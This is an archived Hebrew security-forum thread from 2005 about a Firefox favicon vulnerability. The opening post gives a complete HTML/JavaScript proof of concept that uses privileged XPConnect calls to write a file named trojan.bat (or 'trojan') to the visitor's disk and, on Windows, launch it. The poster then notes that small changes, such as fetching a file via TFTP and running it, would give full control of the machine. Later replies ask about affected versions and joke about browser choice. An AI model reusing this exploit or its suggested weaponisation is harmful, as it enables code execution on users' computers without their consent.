ארכיון רד-בורד: באג אבטחה חמור בדפדפן FF!

20/04/2005 04:44:57 cp77fk4r

הבאג קיים ב "favicons LINK" וניצולו מאפשר להריץ פקודות דרך הדפדפן על המחשב המרוחק.
ניתן לראות דוגמאת PoC שיוצרת קובץ בשם Trojan.bat על המחשב של הגולש ושומרת אותו בכונן C.

קוד:
<html>
<head>
<link rel="SHORTCUT ICON" href="favicon.ico">
<script language="JavaScript" type="text/javascript">
var pf = navigator.platform.toLowerCase();
if (pf.indexOf("win") != -1) {
var os = "win";
} else if (pf.indexOf("mac") != -1) {
var os = "mac";
} else {
var os = "linux"
}
function runDemo() {
// this is an ugly caching workaround
document.getElementById(’outhtml’).innerHTML = "";
document.getElementById(’outhtml’).innerHTML +=
document.getElementById(’clearhtml’).value
document.getElementById(’outhtml’).innerHTML +=
document.getElementById(’clearhtml’).value
document.getElementById(’outhtml’).innerHTML +=
document.getElementById(’clearhtml’).value
window.setTimeout("document.getElementById(’outhtml’).innerHTML +=
document.getElementById(’linkhtml_"+os+"’).value",300);
}
</script>
</head>
<body>

<div id="outhtml" style="display:none"></div>

<textarea id="clearhtml" style="display:none">
<link rel="SHORTCUT ICON" href="favicon.ico">
</textarea>

<textarea id="linkhtml_win" style="display:none">
<link rel="SHORTCUT ICON" href="javascript:delayedOpenWindow
(’javascript:netscape.security.PrivilegeManager.enablePrivilege
(\’UniversalXPConnect\’);file=Components.classes[\’@mozilla.org/file/local;1\’]
.createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(\’c:\\\\trojan.bat\’);file.createUnique(Components.interfaces.nsIFile
.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\’@mozilla.org/
network/file-output-stream;1\’].createInstance(Components.interfaces.nsIFile
OutputStream);outputStream.init(file,0x04|0x08|0x20,420,0);output=\’@ECHO
OFF\\n:BEGIN\\nCLS\\nDIR\\nPAUSE\\n:END\’;outputStream.write(output,
output.length);outputStream.close();file.launch();’,’’,’’)">
</textarea>

<textarea id="linkhtml_mac" style="display:none">
<link rel="SHORTCUT ICON" href="javascript:delayedOpenWindow(’javascript:
netscape.security.PrivilegeManager.enablePrivilege(\’UniversalXPConnect\’);
file=Components.classes[\’@mozilla.org/file/local;1\’].createInstance(Components
.interfaces.nsILocalFile);file.initWithPath(\’/trojan\’);file.createUnique(Components
.interfaces.nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes
[\’@mozilla.org/network/file-output-stream;1\’].createInstance(Components.interfaces
.nsIFileOutputStream);outputStream.init(file,0x04|0x08|0x20,420,0);
output=\’trojan!\’;outputStream.write(output,output.length);outputStream.close();’,’’,’’)">
</textarea>

<textarea id="linkhtml_linux" style="display:none">
<link rel="SHORTCUT ICON" href="javascript:delayedOpenWindow(’javascript:netscape
.security.PrivilegeManager.enablePrivilege(\’UniversalXPConnect\’);file=Components
.classes[\’@mozilla.org/file/local;1\’].createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(\’~/trojan\’);file.createUnique(Components.interfaces.nsIFile
.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\’@mozilla.org/network/
file-output-stream;1\’].createInstance(Components.interfaces.nsIFileOutputStream);
outputStream.init(file,0x04|0x08|0x20,420,0);output=\’trojan!\’;outputStream.
write(output,output.length);outputStream.close();’,’’,’’)">
</textarea><br>
<a href="#" onclick="runDemo();runDemo();">Click HERE</a>
</div>
</body>
</html>

מיותר לציין כמובן שהקוד הוא רק PoC והוא לא מזיק בהרצתו- אבל ע"י שינוים קטנים בקוד אפשר להשיג גישה מלאה למחשב (למשל בעזרת הפקודה TFTP להוריד קובץ למחשב ואז בעזרת הפקודה Call להריץ אותו..).

מידע על הבאג אפשר למצוא בFrSIRT:
http://www.frsirt.com/exploits/20050416.MFSA200537.php

22/04/2005 19:37:13 Z-oro

לא כתבו אם הבאג פוגע בכל הגירסאות
כולל הגירסא 1.0.2?
מקווה שלא
תודה על העידכון

24/04/2005 14:24:47 RayzeR

מה המסקנה ? צריך להתשתמש במוזילה רגילה :)
איך זה פוגע במשתמשי לינוקס ?

24/04/2005 20:54:35 cp77fk4r

שים לב שהקוד מתחלק לשלושה חלקים וקיימת גם בדיקה האם המערכת הפעלה היא Linux- הקוד פוגע כמעט באותו האופן גם במערכת הזאת.

ומה המסכנה? שום דבר בעולם לא מאובטח ולא חייב להיות מאובטח, תמיד ימצאו דרך לפגוע בך- פשוט צריך להיות חכמים.

26/04/2005 03:28:01 RayzeR

ולהשתמש במוצרים של מיקרוסופט שתמיד יוציאו עדכונים בשבילך כי הם קודם כל דואגים ללקוחות :) חח[ההודעה נערכה על-ידי cp77fk4r ב-28/04/2005 00:10:29]

רד-בורד: ארכיון

ראשי > אבטחת מידע > באג אבטחה חמור בדפדפן FF!